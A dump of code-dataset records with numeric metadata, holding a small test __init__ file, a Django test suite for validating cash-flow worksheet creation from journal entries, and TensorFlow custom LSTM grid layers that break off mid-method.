2242a44ee4dd081daa5a99cde7c6a7d081411414
| 71
|
py
|
Python
|
tests/tests/base_tests/__init__.py
|
rescbr/aws-device-farm-appium-python-tests-for-ios-sample-app
|
e006bfc830fa2dc27fe5ba630b662cd022a837c4
|
[
"Apache-2.0"
] | null | null | null |
tests/tests/base_tests/__init__.py
|
rescbr/aws-device-farm-appium-python-tests-for-ios-sample-app
|
e006bfc830fa2dc27fe5ba630b662cd022a837c4
|
[
"Apache-2.0"
] | null | null | null |
tests/tests/base_tests/__init__.py
|
rescbr/aws-device-farm-appium-python-tests-for-ios-sample-app
|
e006bfc830fa2dc27fe5ba630b662cd022a837c4
|
[
"Apache-2.0"
] | null | null | null |
from .base_test import BaseTest
from .base_tab_test import BaseTabTest
| 23.666667
| 38
| 0.859155
| 11
| 71
| 5.272727
| 0.636364
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 39
| 35.5
| 0.920635
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
225588e98a5f13e5fea3f3153e954b7a47291058
| 28,555
|
py
|
Python
|
metalacc/api/tests/test_cash_flow_worksheet.py
|
stricoff92/metalaccounting
|
6c9f650b3dd3c74c3ebbe847e0c05bb233e14153
|
[
"MIT"
] | null | null | null |
metalacc/api/tests/test_cash_flow_worksheet.py
|
stricoff92/metalaccounting
|
6c9f650b3dd3c74c3ebbe847e0c05bb233e14153
|
[
"MIT"
] | 3
|
2021-03-30T14:01:37.000Z
|
2021-06-10T19:46:42.000Z
|
metalacc/api/tests/test_cash_flow_worksheet.py
|
stricoff92/metalaccounting
|
6c9f650b3dd3c74c3ebbe847e0c05bb233e14153
|
[
"MIT"
] | null | null | null |
import datetime as dt
import json
from django.urls import reverse
from rest_framework import status
from .base import BaseTestBase
from api.models import Period, CashFlowWorksheet, Account, JournalEntryLine
class CashFlowWorksheetTests(BaseTestBase):
def setUp(self):
super().setUp()
self.client.force_login(self.user)
self.company = self.factory.create_company(self.user)
self.period = self.factory.create_period(self.company, "2020-01-01", "2020-03-31")
Account.objects.create_default_accounts(self.company)
# Create journal Entries.
# Cash for Common Stock.
self.jounral_entry_1 = self.factory.create_journal_entry(self.period, "2020-01-02")
self.je1_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_1,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_DEBIT, 50000)
self.je1_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_1,
Account.objects.get(name="Common Stock"), JournalEntryLine.TYPE_CREDIT, 50000)
# Inventory for Cash and credit.
self.jounral_entry_2 = self.factory.create_journal_entry(self.period, "2020-01-03")
self.je2_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_2,
Account.objects.get(name="Inventory"), JournalEntryLine.TYPE_DEBIT, 20000)
self.je2_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_2,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_CREDIT, 5000)
self.je2_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_2,
Account.objects.get(name="A/P"), JournalEntryLine.TYPE_CREDIT, 15000)
# Bought a Truck.
self.jounral_entry_3 = self.factory.create_journal_entry(self.period, "2020-01-04")
self.je3_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_3,
Account.objects.get(name="PPE"), JournalEntryLine.TYPE_DEBIT, 125000)
self.je3_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_3,
Account.objects.get(name="Debt: Long Term"), JournalEntryLine.TYPE_CREDIT, 120000)
self.je3_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_3,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_CREDIT, 5000)
# Sold some inventory for a profit
self.jounral_entry_4 = self.factory.create_journal_entry(self.period, "2020-01-05")
self.je4_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_DEBIT, 6500)
self.je4_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="CoGS"), JournalEntryLine.TYPE_DEBIT, 12500)
self.je4_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="A/R"), JournalEntryLine.TYPE_DEBIT, 10000)
self.je4_jel4 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="Sales Revenue"), JournalEntryLine.TYPE_CREDIT, 16500)
self.je4_jel5 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="Inventory"), JournalEntryLine.TYPE_CREDIT, 12500)
# Pay off some part of the truck
self.jounral_entry_5 = self.factory.create_journal_entry(self.period, "2020-01-06")
self.je5_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_5,
Account.objects.get(name="Debt: Long Term"), JournalEntryLine.TYPE_DEBIT, 2000)
self.je5_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_5,
Account.objects.get(name="Interest Expenses"), JournalEntryLine.TYPE_DEBIT, 200)
self.je5_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_5,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_CREDIT, 2200)
# Sold some inventory on credit
self.jounral_entry_6 = self.factory.create_journal_entry(self.period, "2020-01-07")
self.je6_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_6,
Account.objects.get(name="CoGS"), JournalEntryLine.TYPE_DEBIT, 5000)
self.je6_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_6,
Account.objects.get(name="A/R"), JournalEntryLine.TYPE_DEBIT, 7500)
self.je6_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_6,
Account.objects.get(name="Sales Revenue"), JournalEntryLine.TYPE_CREDIT, 7500)
self.je6_jel4 = self.factory.create_journal_entry_line(
self.jounral_entry_6,
Account.objects.get(name="Inventory"), JournalEntryLine.TYPE_CREDIT, 5000)
# record depreciation on truck
self.jounral_entry_7 = self.factory.create_journal_entry(
self.period, "2020-01-08", is_adjusting_entry=True)
self.je7_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_7,
Account.objects.get(name="Depreciation Expenses"), JournalEntryLine.TYPE_DEBIT, 4000)
self.je7_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_7,
Account.objects.get(name="Accumulated Depreciation"), JournalEntryLine.TYPE_CREDIT, 4000)
def tearDown(self):
super().tearDown()
def test_user_cant_create_a_cashflow_worksheet_for_a_period_if_one_already_exists_and_is_in_sync(self):
""" Test that a user cant create a cashflow worksheet if one already exists and is in sync
"""
existing_cash_flow_worksheet = self.factory.create_cashflow_worksheet(self.period)
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
response = self.client.post(url, {}, format="json")
self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
def test_user_can_create_a_cashflow_worksheet_for_a_period_if_one_already_exists_and_is_not_in_sync(self):
""" Test that a out of sync worksheets are deleted when the user tries to create a new cashflow worksheet
(successfully or not)
"""
existing_cash_flow_worksheet = self.factory.create_cashflow_worksheet(self.period)
existing_cash_flow_worksheet.version_hash = "asdasdasdasd"
existing_cash_flow_worksheet.save()
original_cfw_id = existing_cash_flow_worksheet.id
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
response = self.client.post(url, {}, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Out of sync cash flow worksheet was deleted.
self.assertFalse(CashFlowWorksheet.objects.filter(id=original_cfw_id).exists())
def test_user_can_create_a_cashflow_worksheet_with_valid_data(self):
""" Test that a user can create a worksheet by submitting valid worksheet data.
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CashFlowWorksheet.objects.count(), 1)
cfws = CashFlowWorksheet.objects.first()
self.assertEqual(cfws.period, self.period)
self.assertEqual(cfws.version_hash, self.period.version_hash)
cfws_data = cfws.worksheet_data
cfws_data = {row['journal_entry']:row for row in cfws_data}
self.assertEqual(len(cfws_data), 5)
self.assertEqual(
cfws_data[self.jounral_entry_1.slug],
{
'journal_entry':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
})
self.assertEqual(
cfws_data[self.jounral_entry_2.slug],
{
'journal_entry':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
})
self.assertEqual(
cfws_data[self.jounral_entry_3.slug],
{
'journal_entry':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
})
self.assertEqual(
cfws_data[self.jounral_entry_4.slug],
{
'journal_entry':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
})
self.assertEqual(
cfws_data[self.jounral_entry_5.slug],
{
'journal_entry':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
})
def test_user_cant_create_a_cashflow_worksheet_with_extra_journal_entry_data(self):
""" Test that a user cant create a worksheet by submitted a non cash journal entry.
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# (Erroneously including a NON CASH TRANSACTIONS
{
'journal_entry_slug':self.jounral_entry_6.slug,
'operations':0,
'investments':0,
'finances':0,
},
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
self.assertTrue(f"journal entry slug missing:{self.jounral_entry_6.slug}" in response.data)
def test_user_cant_create_a_cashflow_worksheet_when_they_leave_off_a_cash_journal_entry(self):
""" Test that a user cant create a worksheet when excluding a cash journal entry.
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},
# {
# # Inventory for Cash and credit. Erroneously EXCLUDE THIS ENTRY
# 'journal_entry_slug':self.jounral_entry_2.slug,
# 'operations':5000,
# 'investments':0,
# 'finances':0,
# },
{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
self.assertTrue(f"Journal Entries missing: {self.jounral_entry_2.slug}" in response.data)
def test_user_cant_create_a_cashflow_worksheet_if_allocated_cash_is_too_low(self):
""" Test that a user cant create a worksheet when they didnt allocate enough cash for an entry
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},
{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},
{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':1,
'investments':0, # NOT ENOUGH CASH ALLOCATED (1 dollar short)
'finances':4998,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
self.assertTrue(f"journal entry {self.jounral_entry_3.slug} has been allocated cash incorrectly" in response.data)
def test_user_cant_create_a_cashflow_worksheet_if_allocated_cash_is_too_high(self):
""" Test that a user cant create a worksheet when they allocated too much cash for an entry
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},
{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},
{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':1,
'investments':5000, # TOO MUCH CASH ALLOCATED (1 dollar over)
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
self.assertTrue(f"journal entry {self.jounral_entry_3.slug} has been allocated cash incorrectly" in response.data)
def test_user_cant_create_a_cashflow_worksheet_for_another_users_period(self):
""" Test that a user can create a worksheet by submitting valid worksheet data.
"""
self.client.force_login(self.other_user)
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
# other user has no access
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# owner can create
self.client.force_login(self.user)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_user_cant_create_a_cashflow_worksheet_with_journal_entries_from_another_period(self):
""" Test that a user cant create a worksheet for period A by submitting Journal entries from period B.
"""
# Pay off some part of the truck in another period
other_period = self.factory.create_period(self.company, "2020-04-01", "2020-06-30")
other_jounral_entry = self.factory.create_journal_entry(other_period, "2020-04-06")
other_jel_1 = self.factory.create_journal_entry_line(
other_jounral_entry,
Account.objects.get(name="Debt: Long Term"), JournalEntryLine.TYPE_DEBIT, 1000)
other_jel_2 = self.factory.create_journal_entry_line(
other_jounral_entry,
Account.objects.get(name="Interest Expenses"), JournalEntryLine.TYPE_DEBIT, 100)
other_jel_3 = self.factory.create_journal_entry_line(
other_jounral_entry,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_CREDIT, 1100)
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Paid off part of the truck # EXTRA ENTRY FROM WRONG PERIOD
'journal_entry_slug':other_jounral_entry.slug,
'operations':0,
'investments':0,
'finances':1100,
}, {
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# Drop that extra entry and try again.
data = data[1:]
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CashFlowWorksheet.objects.count(), 1)
    def test_user_cant_create_a_cashflow_worksheet_with_netagive_numbers(self):
        """ Test that a worksheet containing a negative allocation amount is
        rejected with a 400 and a validation message, and nothing is created.
        """
        url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
        data = [
            {
                # Cash for Common Stock.
                'journal_entry_slug':self.jounral_entry_1.slug,
                'operations':0,
                'investments':0,
                'finances':50000,
            },{
                # Inventory for Cash and credit.
                'journal_entry_slug':self.jounral_entry_2.slug,
                'operations':5000,
                'investments':0,
                'finances':0,
            },{
                # Bought a Truck.
                'journal_entry_slug':self.jounral_entry_3.slug,
                'operations':0,
                'investments':5000,
                'finances':0,
            },{
                # Sold some inventory for a profit
                'journal_entry_slug':self.jounral_entry_4.slug,
                'operations':6500,
                'investments':0,
                'finances':0,
            },{
                # Pay off some part of the truck
                'journal_entry_slug':self.jounral_entry_5.slug,
                'operations':-200, # NEGATIVE NUMBER — the invalid value under test
                'investments':0,
                'finances':2000,
            },
            # NON CASH TRANSACTIONS (intentionally left out of the payload)
            # {
            #     'journal_entry_slug':self.jounral_entry_6.slug,
            #     'operations':0,
            #     'investments':0,
            #     'finances':0,
            # },
            # {
            #     'journal_entry_slug':self.jounral_entry_7.slug,
            #     'operations':0,
            #     'investments':0,
            #     'finances':0,
            # },
        ]
        self.assertEqual(CashFlowWorksheet.objects.count(), 0)
        response = self.client.post(
            url, json.dumps(data), content_type='application/json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertTrue("operations must be greater than 0" in str(response.data))
| 40.503546
| 122
| 0.557941
| 2,954
| 28,555
| 5.156398
| 0.085308
| 0.081933
| 0.103992
| 0.073529
| 0.84933
| 0.842962
| 0.825827
| 0.813747
| 0.78427
| 0.726037
| 0
| 0.040195
| 0.33959
| 28,555
| 704
| 123
| 40.56108
| 0.767526
| 0.163684
| 0
| 0.671706
| 0
| 0
| 0.141141
| 0.018446
| 0
| 0
| 0
| 0
| 0.086393
| 1
| 0.025918
| false
| 0
| 0.012959
| 0
| 0.041037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2257ad2e23294e492e033c2cbab072ae34b3c591
| 16,351
|
py
|
Python
|
2D_RNN/detailed_layer.py
|
Romit-Maulik/Tutorials-Demos-Practice
|
a58ddc819f24a16f7059e63d7f201fc2cd23e03a
|
[
"MIT"
] | null | null | null |
2D_RNN/detailed_layer.py
|
Romit-Maulik/Tutorials-Demos-Practice
|
a58ddc819f24a16f7059e63d7f201fc2cd23e03a
|
[
"MIT"
] | null | null | null |
2D_RNN/detailed_layer.py
|
Romit-Maulik/Tutorials-Demos-Practice
|
a58ddc819f24a16f7059e63d7f201fc2cd23e03a
|
[
"MIT"
] | null | null | null |
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_path = os.path.dirname(dir_path)
import tensorflow as tf
tf.random.set_seed(10)
tf.keras.backend.set_floatx('float32')
# Special layer to have more control over LSTM encoder cell
# Special layer to have more control over LSTM encoder cell
class LSTM_grid_layer_v1(tf.keras.layers.Layer):
    """Manually unrolled LSTM encoder over a list of input sequences.

    One independent set of LSTM gate weights (update/forget/output/candidate)
    is kept per entry of ``input_dim_list``. ``call`` unrolls each sequence
    for its own length and returns the final hidden state and cell memory of
    every input as two lists.
    """

    def __init__(self, input_dim_list, seq_len_list):
        # BUG FIX: the original called super(LSTM_encoder_layer, self).__init__(),
        # but `LSTM_encoder_layer` is not defined anywhere in this module, so
        # instantiating the layer raised NameError. Zero-argument super()
        # resolves the enclosing class correctly under Python 3.
        super().__init__()
        self.num_dof = len(input_dim_list)        # number of independent inputs
        self.input_dim_list = input_dim_list      # state dimension per input
        self.seq_len_list = seq_len_list          # unroll length per input
        self.initialize_layer()

    def initialize_layer(self):
        """Create the per-input trainable gate weights and biases."""
        var_init = tf.random_normal_initializer()
        self.wu_list = []
        self.wf_list = []
        self.wo_list = []
        self.wc_list = []
        self.bu_list = []
        self.bf_list = []
        self.bo_list = []
        self.bc_list = []
        # NOTE(review): m_list/h_list are created but never written or read in
        # this class — kept for interface compatibility; confirm before removal.
        self.m_list = []
        self.h_list = []
        for i in range(self.num_dof):
            # Each kernel maps the concatenated [input, hidden] (2*dim) to dim.
            self.wu_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
                    trainable=True
                )
            )
            self.wf_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
                    trainable=True
                )
            )
            self.wo_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
                    trainable=True
                )
            )
            self.wc_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
                    trainable=True
                )
            )
            self.bu_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
                    trainable=True
                )
            )
            self.bf_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
                    trainable=True
                )
            )
            self.bo_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
                    trainable=True
                )
            )
            self.bc_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
                    trainable=True
                )
            )

    @tf.function
    def call(self, input_list):
        """Encode each input sequence; return final (hidden, memory) per input.

        Assumes input_list[j] is (batch, seq_len_list[j], input_dim_list[j]) —
        the time axis is indexed as [:, i] below. TODO confirm with callers.
        """
        hh_list = []
        mm_list = []
        for j in range(self.num_dof):  # For each state vector input
            seq_length = self.seq_len_list[j]
            # Zero-initialise hidden state and memory: batch_size x state_dimension.
            hh = tf.zeros(shape=(tf.shape(input_list[j])[0],self.input_dim_list[j]),dtype='float32')
            mm = tf.zeros(shape=(tf.shape(input_list[j])[0],self.input_dim_list[j]),dtype='float32')
            # Unroll across the time dimension.
            for i in range(seq_length):
                raw_inputs = input_list[j][:,i]
                inputs = tf.concat([raw_inputs,hh],axis=-1)
                # Standard LSTM gates: update, forget, output, candidate.
                gu = tf.nn.sigmoid(tf.matmul(inputs,self.wu_list[j]) + self.bu_list[j])
                gf = tf.nn.sigmoid(tf.matmul(inputs,self.wf_list[j]) + self.bf_list[j])
                go = tf.nn.sigmoid(tf.matmul(inputs,self.wo_list[j]) + self.bo_list[j])
                gc = tf.nn.tanh(tf.matmul(inputs,self.wc_list[j]) + self.bc_list[j])
                mm = gf*mm + gu*gc
                hh = tf.nn.tanh(go*mm)
            hh_list.append(hh)
            mm_list.append(mm)
        return hh_list, mm_list
# Special layer to have more control over LSTM grid cell
class LSTM_grid_layer_v2(tf.keras.layers.Layer):
    """Grid LSTM step that mixes existing hidden/memory states in place.

    Unlike the v1 encoder, ``call`` takes already-computed hidden and memory
    lists and updates them; kernels map a ``grid_dim``-wide concatenation of
    [hidden, memory] to each output dimension.
    """

    def __init__(self, grid_dim, output_dim_list, seq_len_list):
        # BUG FIX: the original called super(LSTM_grid_layer, self).__init__(),
        # but `LSTM_grid_layer` is not defined in this module (the class here
        # is LSTM_grid_layer_v2), so construction raised NameError.
        super().__init__()
        self.num_dof = len(output_dim_list)       # number of independent states
        self.output_dim_list = output_dim_list    # output dimension per state
        self.seq_len_list = seq_len_list          # unroll count per state
        self.grid_dim = grid_dim                  # width of the concatenated input
        self.initialize_layer()

    def initialize_layer(self):
        """Create the per-state trainable gate weights and biases."""
        var_init = tf.random_normal_initializer()
        self.wu_list = []
        self.wf_list = []
        self.wo_list = []
        self.wc_list = []
        self.bu_list = []
        self.bf_list = []
        self.bo_list = []
        self.bc_list = []
        # NOTE(review): m_list/h_list are never used in this class — kept for
        # interface compatibility; confirm before removal.
        self.m_list = []
        self.h_list = []
        for i in range(self.num_dof):
            self.wu_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.grid_dim, self.output_dim_list[i]), dtype="float32"),
                    trainable=True
                )
            )
            self.wf_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.grid_dim, self.output_dim_list[i]), dtype="float32"),
                    trainable=True
                )
            )
            self.wo_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.grid_dim, self.output_dim_list[i]), dtype="float32"),
                    trainable=True
                )
            )
            self.wc_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.grid_dim, self.output_dim_list[i]), dtype="float32"),
                    trainable=True
                )
            )
            self.bu_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.output_dim_list[i],), dtype="float32"),
                    trainable=True
                )
            )
            self.bf_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.output_dim_list[i],), dtype="float32"),
                    trainable=True
                )
            )
            self.bo_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.output_dim_list[i],), dtype="float32"),
                    trainable=True
                )
            )
            self.bc_list.append(
                tf.Variable(
                    initial_value=var_init(shape=(self.output_dim_list[i],), dtype="float32"),
                    trainable=True
                )
            )

    @tf.function
    def call(self, hidden, memory):
        '''
        Hidden and memory are lists of tensors for the hidden state and the memory of different inputs.
        Each pair is updated in place for seq_len_list[j] steps and the (mutated) lists are returned.
        NOTE(review): the kernel input is concat([hidden[j], memory[j]]), so
        grid_dim must equal 2 * output_dim_list[j] for the matmul to be valid —
        confirm with callers.
        '''
